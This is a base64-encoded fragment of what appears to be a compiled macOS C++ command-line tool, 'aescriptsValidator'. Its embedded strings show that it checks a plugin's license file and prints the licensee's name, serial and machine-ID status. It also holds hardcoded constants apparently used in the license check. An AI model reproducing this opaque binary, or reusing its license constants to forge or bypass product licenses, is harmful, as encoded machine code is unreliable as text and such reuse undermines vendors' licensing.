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QhgJDDQYAAAAAAAAAJAAAALwBAACf0P///////zsAAAAAAAAAAEEOEIYCQw0GAAAAAAAAACQAAADkAQAAstD///////8LAAAAAAAAAABBDhCGAkMNBgAAAAAAAAAkAAAADAIAAJXQ////////CwAAAAAAAAAAQQ4QhgJDDQYAAAAAAAAAJAAAADQCAAB40P///////wsAAAAAAAAAAEEOEIYCQw0GAAAAAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACQAAAAcAAAAhND///////9IAAAAAAAAAABBDhCGAkMNBgAAAAAAAAAkAAAARAAAAKTQ////////kwAAAAAAAAAAQQ4QhgJDDQZGgwWOBI8DJAAAAGwAAAAY0f///////zEAAAAAAAAAAEEOEIYCQw0GQoMDAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACQAAAAcAAAACdH///////9ZAAAAAAAAAABBDhCGAkMNBkKDAwAAAAAcAAAAAAAAAAF6UExSAAF4EAebvQEAABAQDAcIkAEAADQAAAAkAAAAGtH///////9yCQAAAAAAAAij9P///////0EOEIYCQw0GUIMHjAaNBY4EjwMAAAAALAAAAFwAAACa5v///////6ICAAAAAAAACAv2////////QQ4QhgJDDQZMgwWOBI8DNAAAAIwAAAAk2v///////6gGAAAAAAAACEP2////////QQ4QhgJDDQZQgweMBo0FjgSPAwAAAAA0AAAAxAAAAJTg////////ngUAAAAAAAAI2/b
///////9BDhCGAkMNBlCDB4wGjQWOBI8DAAAAACwAAAA8AQAAnOj///////97AAAAAAAAAABBDhCGAkMNBkeDBowFjgSPAwAAAAAAACwAAABsAQAA6Oj///////+RAAAAAAAAAABBDhCGAkMNBkeDBowFjgSPAwAAAAAAACQAAACcAQAAWOn///////8xAAAAAAAAAABBDhCGAkMNBkKDAwAAAAAAAAAAAAAAAAAAAAABAAAAoHIAAAEAAACocgAAAQAAALByAAABAAAAuHIAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACz4AAAEAAAByVQAAAQAAABRYAAABAAAA+FoAAAEAAAACWwAAAQAAAAxbAAABAAAAFlsAAAEAAAAgWwAAAQAAACpbAAABAAAANFsAAAEAAAA+WwAAAQAAAEhbAAABAAAAUlsAAAEAAABcWwAAAQAAAGZbAAABAAAAcFsAAAEAAAB6WwAAAQAAAIRbAAABAAAAjlsAAAEAAACYWwAAAQAAAKJbAAABAAAArFsAAAEAAAC2WwAAAQAAAMBbAAABAAAAylsAAAEAAADUWwAAAQAAAN5bAAABAAAA6FsAAAEAAADyWwAAAQAAAPxbAAABAAAABlwAAAEAAAAQXAAAAQAAABpcAAABAAAAJFwAAAEAAAAuXAAAAQAAADhcAAABAAAAQlwAAAEAAABMXAAAAQAAAFZcAAABAAAAYFwAAAEAAABqXAAAAQAAAHRcAAABAAAAflwAAAEAAACIXAAAAQAAAJJcAAABAAAAnFwAAAEAAACmXAAAAQAAALBcAAABAAAAulwAAAEAAADEXAAAAQAAAM5cAAABAAAA2FwAAAEAAADiXAAAAQAAAOxcAAABAAAA9lwAAAEAAAAAXQAAAQAAAApdAAABAAAAFF0AAAEAAAAeXQAAAQAAAChdAAABAAAAMl0AAAEAAAA8XQAAAQAAAEZdAAABAAAAUF0AAAEAAABaXQAAAQAAALASAAABAAAAMD8AAAEAAAAwWQAAAQAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARIgBVSGBEABRAX19aTlNzNF9SZXAxMV9TX3Rlcm1pbmFsRQBRciiQQF9fWk5TczRfUmVwMjBfU19lbXB0eV9yZXBfc3RvcmFnZUUAoNgEYBiQkEBfX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAgJj7/////////wFgAJBAX19aU3Q0Y291dACQQF9fWmRhUHYAgIgDkEBfX1puYW0AkEBfX19neHhfcGVyc29uYWxpdHlfdjAAgOj8/////////wGQFUBfX19zdGFja19jaGtfZ3VhcmQAkEBkeWxkX3N0dWJfYmluZGV
yAJAAAAAAAABAX19aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAUXJwkEBfX1pOU3MxMl9TX2NvbnN0cnVjdElOOV9fZ251X2N4eDE3X19ub3JtYWxfaXRlcmF0b3JJUGNTc0VFRUVTMl9UX1M0X1JLU2FJY0VTdDIwZm9yd2FyZF9pdGVyYXRvcl90YWcAkEBfX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1M4XwCA6P//////////AZBAX19aZGFQdgCA4AKQQF9fWm5hbQCQAAAAAAAAcoABFEBfX1pOS1NzNGZpbmRFUEtjbW0AkAByiAEUQF9fWk5LU3M2c3Vic3RyRW1tAJAAcpABFEBfX1pOS1N0MTNiYXNpY19maWxlYnVmSWNTdDExY2hhcl90cmFpdHNJY0VFN2lzX29wZW5FdgCQAHKYARRAX19aTktTdDE1YmFzaWNfc3RyaW5nYnVmSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUUzc3RyRXYAkAByoAEUQF9fWk5LU3Q5YmFzaWNfaW9zSWNTdDExY2hhcl90cmFpdHNJY0VFNGZpbGxFdgCQAHKoARRAX19aTktTdDliYXNpY19pb3NJY1N0MTFjaGFyX3RyYWl0c0ljRUU1d2lkZW5FYwCQAHKwARRAX19aTlNpMTBfTV9leHRyYWN0SW1FRVJTaVJUXwCQAHK4ARRAX19aTlNpNHJlYWRFUGNsAJAAcsABFEBfX1pOU2k1c2Vla2dFeFN0MTJfSW9zX1NlZWtkaXIAkAByyAEUQF9fWk5TaTV0ZWxsZ0V2AJAActABFEBfX1pOU28zcHV0RWMAkABy2AEUQF9fWk5TbzVmbHVzaEV2AJAAcuABFEBfX1pOU281d3JpdGVFUEtjbACQAHLoARRAX19aTlNvOV9NX2luc2VydEltRUVSU29UXwCQAHLwARRAX19aTlNvbHNFaQCQAHL4ARRAX19aTlNzMTJfTV9sZWFrX2hhcmRFdgCQAHKAAhRAX19aTlNzNF9SZXAxMF9NX2Rlc3Ryb3lFUktTYUljRQCQAHKIAhRAX19aTlNzNF9SZXA5X1NfY3JlYXRlRW1tUktTYUljRQCQAHKQAhRAX19aTlNzNWVyYXNlRW1tAJAAcpgCFEBfX1pOU3M2YXBwZW5kRVBLY20AkAByoAIUQF9fWk5TczZhcHBlbmRFUktTcwCQAHKoAhRAX19aTlNzNmFzc2lnbkVQS2NtAJAAcrACFEBfX1pOU3M2YXNzaWduRVJLU3MAkAByuAIUQF9fWk5TczlfTV9tdXRhdGVFbW1tAJAAcsACFEBfX1pOU3M5cHVzaF9iYWNrRWMAkAByyAIUQF9fWk5Tc0MxRVBLY1JLU2FJY0UAkABy0AIUQF9fWk5Tc0MxRVBLY21SS1NhSWNFAJAActgCFEBfX1pOU3NDMUVSS1NzAJAAcuACFEBfX1pOU3NEMkV2AJAAcugCFEBfX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFNWNsb3NlRXYAkABy8AIUQF9fWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVDMUVQS2NTdDEzX0lvc19PcGVubW9kZQCQAHL4AhRAX19aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXYAkABygAMUQF9fWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU